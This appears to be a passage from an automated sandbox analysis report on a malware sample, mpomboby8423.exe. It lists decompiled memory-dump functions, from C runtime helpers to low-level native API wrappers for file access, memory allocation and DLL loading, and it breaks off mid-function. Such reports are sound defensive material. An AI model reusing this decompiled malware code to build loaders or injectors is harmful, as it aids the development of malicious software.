MultiByteToWideChar.KERNEL32(20432F41,00000009,?,00000001,00000000,00000000,?,00000000,?,?,012CFF04,?,00000000), ref: 012C1739

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 1cc21933f5f2fef1fc90ee615b4fc6cd8859e72768d01b18b8df8a3a8f7044b3
Instruction ID: 9bfb3530cd68e6c6989e765b98217ba069f8bf745d35a02deb2d37514ef1c708
Opcode Fuzzy Hash: 1cc21933f5f2fef1fc90ee615b4fc6cd8859e72768d01b18b8df8a3a8f7044b3
Instruction Fuzzy Hash: DA31D230620217EFEB258E28CC46BBA7FA5FF41A50F29861CE72487192D730D464DB90

Uniqueness

Uniqueness Score: -1.00%

Function 012BECB1, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012BECB1(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E012BF1FE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E012BED37(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E012BF473(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E012BF3B4(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x012becb4
0x012becba
0x012bed2d
0x00000000
0x012becc1
0x012becc1
0x012becc4
0x012becdf
0x012bece2
0x012bed02
0x012bed14
0x012bece4
0x012bece4
0x012bece7
0x00000000
0x012bece9
0x012becfb
0x012becfb
0x012bece7
0x012bed32
0x012bed36
0x012becc6
0x012becde
0x012becde
0x012becc4

APIs

__cftof_l.LIBCMT ref: 012BECD5

Part of subcall function 012BF3B4: __fltout2.LIBCMT ref: 012BF3DD

__cftog_l.LIBCMT ref: 012BECFB
__cftoe_l.LIBCMT ref: 012BED2D

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 200fe126f77aae2c1e368de3d0c9dbe5e8f696b565085107dcdb4290603baf7d
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 9601483246014BBBCF125E88CC818EE3F2ABB19394B5A8915FB1858131C276C9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 012BCC10, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E012BCC10(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0x12cd9a0);
				E012B9160(__ebx, __edi, __esi);
				_t31 = E012BD59F(__edx, __edi, _t35);
				_t25 =  *0x12d1c6c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E012BBE5F(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x12d1524; // 0x5cf988
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x12d1820;
								if(__eflags != 0) {
									E012B8F53(_t33);
								}
							}
						}
						_t20 =  *0x12d1524; // 0x5cf988
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0x12d1524; // 0x5cf988
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E012BCCAC();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E012B751F(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E012B91A5(_t33);
			}

0x012bcc10
0x012bcc10
0x012bcc10
0x012bcc10
0x012bcc12
0x012bcc17
0x012bcc21
0x012bcc23
0x012bcc2c
0x012bcc4d
0x012bcc53
0x012bcc57
0x012bcc5a
0x012bcc5d
0x012bcc63
0x012bcc65
0x012bcc67
0x012bcc70
0x012bcc72
0x012bcc74
0x012bcc7a
0x012bcc7d
0x012bcc82
0x012bcc7a
0x012bcc72
0x012bcc83
0x012bcc88
0x012bcc8b
0x012bcc91
0x012bcc95
0x012bcc95
0x012bcc9b
0x012bcca2
0x012bcc34
0x012bcc34
0x012bcc34
0x012bcc37
0x012bcc39
0x012bcc3d
0x012bcc42
0x012bcc4a

APIs

Part of subcall function 012BD59F: __getptd_noexit.LIBCMT ref: 012BD5A0

__lock.LIBCMT ref: 012BCC4D
InterlockedDecrement.KERNEL32(?), ref: 012BCC6A
_free.LIBCMT ref: 012BCC7D
InterlockedIncrement.KERNEL32(005CF988), ref: 012BCC95

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 8a1bbf6fb96579d8c4058d2cb02b8dcab98937fd89ff1be36d1033a6b900d3f9
Instruction ID: f3134bc16a7af7d3f147e116beef5030c321506f2ff80aa1f6fd72fe7babe5f8
Opcode Fuzzy Hash: 8a1bbf6fb96579d8c4058d2cb02b8dcab98937fd89ff1be36d1033a6b900d3f9
Instruction Fuzzy Hash: 1C01D232D21A139BEB25AB69F4C83EE77A0BF65790F098009EB1467680C7346961CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 012B1B30, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E012B1B30(intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v45;
				short _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v64;
				intOrPtr _v68;
				char _v71;
				char _v75;
				char _v79;
				char _v80;
				char _v92;
				char _v167;
				char _v168;
				signed int _t163;
				signed int _t177;
				signed int _t178;
				void* _t186;
				intOrPtr _t189;
				void* _t292;
				void* _t293;
				void* _t294;

				_v64 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v45 = 0;
				_v80 = 0;
				_v79 = 0;
				_v75 = 0;
				_v71 = 0;
				_v168 = 0;
				_t163 = E012B87A0( &_v167, 0, 0x31);
				_t294 = _t293 + 0xc;
				asm("cvttsd2si eax, [ebp+0x8]");
				_v16 = _t163;
				asm("cdq");
				 *(_t292 + 0xffffffffffffffa4) = _v16 % 0x3e8;
				asm("cdq");
				_v16 = _v16 / 0x3e8;
				_v8 = 4;
				while(_v8 >= 0) {
					asm("cdq");
					 *(_t292 + _v8 * 4 - 0x70) = _v16 % 0x64;
					asm("cdq");
					_v16 = _v16 / 0x64;
					_v8 = _v8 - 1;
				}
				_v36 =  *(_t292 + 0xffffffffffffffa4);
				asm("cdq");
				_v20 = _v36 / 0x64;
				asm("cdq");
				_v12 = _v36 % 0x64;
				asm("cdq");
				_v40 = _v12 / 0xa;
				_t177 = _v12;
				asm("cdq");
				_t178 = _t177 / 0xa;
				_v44 = _t177 % 0xa;
				if(_v12 >= 0x14 || _v20 == 0) {
					if(_v12 >= 0x14 || _v20 != 0) {
						if(_v12 <= 0x14 || _v20 == 0) {
							E012B1E50(_t178, _v40,  &_v92);
							E012B1E40( &_v32, _v44,  &_v32);
							E012B8140( &_v64,  &_v32);
							_t294 = _t294 + 8;
						} else {
							E012B1E40(_v20, _v20,  &_v32);
							E012B8140( &_v64, "Hundred ");
							E012B1E50(_v40, _v40,  &_v92);
							E012B8140( &_v64,  &_v92);
							E012B1E40( &_v32, _v44,  &_v32);
							E012B8140( &_v64,  &_v32);
							_t294 = _t294 + 0x18;
						}
					} else {
						E012B1E40( &_v32, _v12,  &_v32);
					}
				} else {
					E012B1E40(_v20, _v20,  &_v32);
					E012B8140( &_v64, "Hundred ");
					E012B1E40(_v12, _v12,  &_v32);
					E012B8140( &_v64,  &_v32);
					_t294 = _t294 + 0x10;
				}
				_v8 = 4;
				while(_v8 >= 0) {
					if( *(_t292 + _v8 * 4 - 0x70) >= 0x14) {
						asm("cdq");
						E012B1E50( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) / 0xa,  &_v92);
						asm("cdq");
						E012B1E40( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) % 0xa,  &_v32);
						E012B8140(_t292 + _v8 * 0x1e - 0x13c,  &_v32);
						_t294 = _t294 + 8;
					} else {
						E012B1E40( &_v32,  *(_t292 + _v8 * 4 - 0x70),  &_v32);
					}
					_v8 = _v8 - 1;
				}
				_v8 = 0;
				while(_v8 < 5) {
					_t189 = E012B82C0(_t292 + _v8 * 0x1e - 0x13c);
					_t294 = _t294 + 4;
					_v68 = _t189;
					if(_v68 != 0) {
						E012B8140( &_v168, _t292 + _v8 * 0x1e - 0x13c);
						E012B8140( &_v168,  &_v80);
						_t294 = _t294 + 0x10;
					}
					_v8 = _v8 + 1;
				}
				E012B8140(_a12,  &_v64);
				_t186 = E012B82C0(_a12);
				 *((char*)(_a12 + _t186 - 1)) = 0;
				return _t186;
			}

0x012b1b39
0x012b1b3f
0x012b1b42
0x012b1b45
0x012b1b48
0x012b1b4b
0x012b1b4f
0x012b1b52
0x012b1b58
0x012b1b5b
0x012b1b5e
0x012b1b61
0x012b1b73
0x012b1b78
0x012b1b7b
0x012b1b80
0x012b1b86
0x012b1b96
0x012b1b9d
0x012b1ba5
0x012b1ba8
0x012b1bba
0x012b1bc3
0x012b1bce
0x012b1bd5
0x012b1bdd
0x012b1bb7
0x012b1bb7
0x012b1bee
0x012b1bf4
0x012b1bfc
0x012b1c02
0x012b1c0a
0x012b1c10
0x012b1c18
0x012b1c1b
0x012b1c1e
0x012b1c24
0x012b1c26
0x012b1c2d
0x012b1c79
0x012b1c97
0x012b1d01
0x012b1d0e
0x012b1d1b
0x012b1d20
0x012b1c9f
0x012b1ca7
0x012b1cb5
0x012b1cc5
0x012b1cd2
0x012b1ce2
0x012b1cef
0x012b1cf4
0x012b1cf4
0x012b1c81
0x012b1c89
0x012b1c89
0x012b1c35
0x012b1c3d
0x012b1c4b
0x012b1c5b
0x012b1c68
0x012b1c6d
0x012b1c6d
0x012b1d23
0x012b1d35
0x012b1d43
0x012b1d63
0x012b1d6c
0x012b1d7c
0x012b1d85
0x012b1d9c
0x012b1da1
0x012b1d45
0x012b1d51
0x012b1d51
0x012b1d32
0x012b1d32
0x012b1da6
0x012b1db8
0x012b1dcc
0x012b1dd1
0x012b1dd4
0x012b1ddb
0x012b1df2
0x012b1e05
0x012b1e0a
0x012b1e0a
0x012b1db5
0x012b1db5
0x012b1e17
0x012b1e23
0x012b1e2e
0x012b1e36

APIs

_memset.LIBCMT ref: 012B1B73

Strings

Hundred , xrefs: 012B1CAC
Hundred , xrefs: 012B1C42

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset
String ID: Hundred $Hundred
API String ID: 2102423945-1478457770
Opcode ID: 5d5d6be37350d0da5fefd9303027d68eddafa4a6ea3acf74b936c53bfb2d96d9
Instruction ID: a95f569d733780c1394ca96ddc0f86644ff1d241387b56324c4d2bb4da8a0539
Opcode Fuzzy Hash: 5d5d6be37350d0da5fefd9303027d68eddafa4a6ea3acf74b936c53bfb2d96d9
Instruction Fuzzy Hash: 40A172B1D20209EBCF04DFE8E8D1BEDB7B9BF98340F148569E115A7240EB749A15CB61

Uniqueness

Uniqueness Score: -1.00%

Function 012BF71C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E012BF71C(void* __ebx, void* __edx, void* __esi, void* __eflags) {
				intOrPtr* _v20;
				void* _t4;
				intOrPtr* _t7;
				intOrPtr _t9;

				_t15 = __edx;
				_t13 = __ebx;
				_t4 = E012C3C1F(0, 0x10000, 0x30000);
				if(_t4 != 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E012B8B87(__ebx, __edx);
					asm("int3");
					_t7 =  *_v20;
					__eflags =  *_t7 - 0xe06d7363;
					if( *_t7 != 0xe06d7363) {
						L9:
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *((intOrPtr*)(_t7 + 0x10)) - 3;
						if( *((intOrPtr*)(_t7 + 0x10)) != 3) {
							goto L9;
						} else {
							_t9 =  *((intOrPtr*)(_t7 + 0x14));
							__eflags = _t9 - 0x19930520;
							if(__eflags == 0) {
								L10:
								E012BC6A9(_t13, _t15, 0, __eflags);
								asm("int3");
								E012BC080(E012BF743);
								__eflags = 0;
								return 0;
							} else {
								__eflags = _t9 - 0x19930521;
								if(__eflags == 0) {
									goto L10;
								} else {
									__eflags = _t9 - 0x19930522;
									if(__eflags == 0) {
										goto L10;
									} else {
										__eflags = _t9 - 0x1994000;
										if(__eflags == 0) {
											goto L10;
										} else {
											goto L9;
										}
									}
								}
							}
						}
					}
				} else {
					return _t4;
				}
			}

0x012bf71c
0x012bf71c
0x012bf72a
0x012bf734
0x012bf738
0x012bf739
0x012bf73a
0x012bf73b
0x012bf73c
0x012bf73d
0x012bf742
0x012bf749
0x012bf74b
0x012bf751
0x012bf778
0x012bf778
0x012bf77b
0x012bf753
0x012bf753
0x012bf757
0x00000000
0x012bf759
0x012bf759
0x012bf75c
0x012bf761
0x012bf77e
0x012bf77e
0x012bf783
0x012bf789
0x012bf78f
0x012bf791
0x012bf763
0x012bf763
0x012bf768
0x00000000
0x012bf76a
0x012bf76a
0x012bf76f
0x00000000
0x012bf771
0x012bf771
0x012bf776
0x00000000
0x00000000
0x00000000
0x00000000
0x012bf776
0x012bf76f
0x012bf768
0x012bf761
0x012bf757
0x012bf736
0x012bf737
0x012bf737

APIs

__controlfp_s.LIBCMT ref: 012BF72A

Part of subcall function 012C3C1F: __control87.LIBCMT ref: 012C3C43

__invoke_watson.LIBCMT ref: 012BF73D

Strings

csm, xrefs: 012BF74B

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: __control87__controlfp_s__invoke_watson
String ID: csm
API String ID: 1371525046-1018135373
Opcode ID: 7382b433a52efc8e20883dbf2fcc5d6bb40b1816efec12ba127dc858bcffb2b8
Instruction ID: 374d844c8ae6afdb1c61d5461efe0c3ba4f636c65d19aae75cfeccdd7a39c2ab
Opcode Fuzzy Hash: 7382b433a52efc8e20883dbf2fcc5d6bb40b1816efec12ba127dc858bcffb2b8
Instruction Fuzzy Hash: FAF024311302071B8B2E997DAEC4AEE378D9F203D1F6445C1E708CE521DB20D691E2D7

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mpomboby8423.exe PID: 2852 Parent PID: 2516 mpomboby8423.exeCOMMON

Executed Functions

Function 00289882, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 478nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 002899DF

Strings

0, xrefs: 00289A67

Memory Dump Source

Source File: 00000005.00000002.2137037377.0000000000280000.00000040.00000001.sdmp, Offset: 00280000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 1f8698086d0aad00fcc7f2e1b13f80eca5bf979c6824a6682474adad6c40c7c8
Instruction ID: f100a1a218959050bd75b0f9de0f5fd2766e8b113d536b8b7af4264dc965c9c6
Opcode Fuzzy Hash: 1f8698086d0aad00fcc7f2e1b13f80eca5bf979c6824a6682474adad6c40c7c8
Instruction Fuzzy Hash: 3AF19274528A4C8FDBA9FF68C894AEEB7E0FB98304F40462AE44ED7251DF349645CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00419F2A, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419F2A(signed int __eax, void* __ebx, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44, void* _a48) {
				void* _v0;

				asm("adc [ecx], ecx");
				if ((__eax & 0x00000068) != 0) goto L3;
			}

0x00419f2c
0x00419f2e

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D

Strings

BMA, xrefs: 0041A002, 0041A010
BMA, xrefs: 0041A01D, 0041A024

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: BMA$BMA
API String ID: 823142352-2163208940
Opcode ID: fce775fb503663ff27088e1c33de41d9a0ef1a834d9c05e0958e2abde8326c2d
Instruction ID: bf928422f6eeb937c3db50d2f4fd6a8b56e8daeec8a51151e9ef52f4371345c9
Opcode Fuzzy Hash: fce775fb503663ff27088e1c33de41d9a0ef1a834d9c05e0958e2abde8326c2d
Instruction Fuzzy Hash: 4D21B3B2211108AFCB08DF89DC91EEB77ADAF8C754F158249FA1D97241D634EC51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419FE0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419FE0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E0041AB30(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
				return _t18;
			}

0x00419fe3
0x00419fef
0x00419ff7
0x0041a002
0x0041a01d
0x0041a025
0x0041a029

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025

Strings

BMA, xrefs: 0041A002, 0041A010
BMA, xrefs: 0041A01D, 0041A024

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 370e936de0c6b30a0e9c68c176e8d16dab5dfb862c4be705976860dd555c5517
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: DCF0A4B2210208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A08A, Relevance: 1.5, APIs: 1, Instructions: 49
nativeCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0041A08A(void* __ecx, void* __eflags, intOrPtr _a3, void* _a7, intOrPtr _a11, intOrPtr _a15, void* _a19, intOrPtr _a23, intOrPtr _a27) {
				intOrPtr* __esi;
				intOrPtr _t15;
				long _t19;
				void* _t23;

				if(__eflags < 0) {
					 *0x5575d9be = _t15;
					_t16 = _a3;
					_t2 = _t16 + 0x10; // 0x300
					_push(0x8b5575d9);
					_t3 = _t16 + 0xc50; // 0x40a923
					E0041AB30(_t23, _a3, _t3,  *_t2, 0, 0x2c);
					_t19 = NtClose(_a7); // executed
					return _t19;
				} else {
					__eflags =  *((intOrPtr*)(__ecx - 0x741374ab)) - __bp;
					__ebp = __esp;
					__eax = _a3;
					__ecx =  *((intOrPtr*)(__eax + 0x10));
					__esi = __eax + 0xc58;
					__eax = _a23;
					__ecx = _a19;
					__eax = _a11;
					__ecx = _a7;
					__eax =  *((intOrPtr*)( *__esi))(_a7, _a11, _a15, _a19, _a23, _a27, __esi, __ebp);
					_pop(__esi);
					_pop(__ebp);
					return _a11;
				}
			}

0x0041a08b
0x0041a05c
0x0041a063
0x0041a066
0x0041a069
0x0041a06f
0x0041a077
0x0041a085
0x0041a089
0x0041a08d
0x0041a08d
0x0041a091
0x0041a093
0x0041a096
0x0041a09f
0x0041a0af
0x0041a0b2
0x0041a0bd
0x0041a0c1
0x0041a0c9
0x0041a0cb
0x0041a0cc
0x0041a0cd
0x0041a0cd

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: ec31716260f3560da9027c5ae8e87b49ce307ecf5a640ea768c2809fc32a521a
Instruction ID: c64019feeec10a50f1a345688cc71cc1f99e4ac053d675df439a5dc86517cb6e
Opcode Fuzzy Hash: ec31716260f3560da9027c5ae8e87b49ce307ecf5a640ea768c2809fc32a521a
Instruction Fuzzy Hash: DF01B1B1200204AFDB10EF98CC84EE77BA8EF88310F10825EFA1897201C630F9518BE1

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040ACD0(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				char _v12;
				char _v16;
				char _v536;
				void* _t15;
				intOrPtr _t17;
				char _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 =  &_v536;
				_t15 = E0041C820( &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CC40(__eflags, _v8);
					_t33 = _t32 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CEC0(__ebx,  &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t18 = E0041B070(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						_push( &_v16);
						_push( &_v12);
						_push(0);
						LdrLoadDll(0); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acec
0x0040acef
0x0040acf4
0x0040acf9
0x0040ad03
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad15
0x0040ad1a
0x0040ad1a
0x0040ad21
0x0040ad29
0x0040ad2c
0x0040ad2e
0x0040ad36
0x0040ad3d
0x0040ad3e
0x0040ad42
0x00000000
0x0040ad44
0x0040ad4a
0x0040acfe
0x0040acfe
0x0040acfe

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction ID: a31c2487d958de86685633fd431b3ef9c8f0d30197873f4edf114e6b439d7a00
Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction Fuzzy Hash: A2015EB5D4020DBBDB10EBA5DC82FDEB7799B54308F0041AAE908A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 961861021b5599f6e321fa2eb4d652485a26ebd9b99d875dc12ce75f1520402c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 3DF0BDB2215208ABCB08CF89DC95EEB77ADAF8C754F158248BA0D97241C630F8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A10B, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A10B(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t22;

				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E0041AB30(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041a113
0x0041a11f
0x0041a127
0x0041a149
0x0041a14d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 5a57e6778e058911c66e4058ae59567d7ef2e6ae38fda266c439da2b2d61f75b
Instruction ID: 568b6acd21e03dab82228af42419c8e5aacd224cb0a43e7d157b177cd9a9a3da
Opcode Fuzzy Hash: 5a57e6778e058911c66e4058ae59567d7ef2e6ae38fda266c439da2b2d61f75b
Instruction Fuzzy Hash: E4F015B2210208ABCB14DF89CC91EEB77ADAF8C754F118249BE0897242C630E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A110, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A110(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
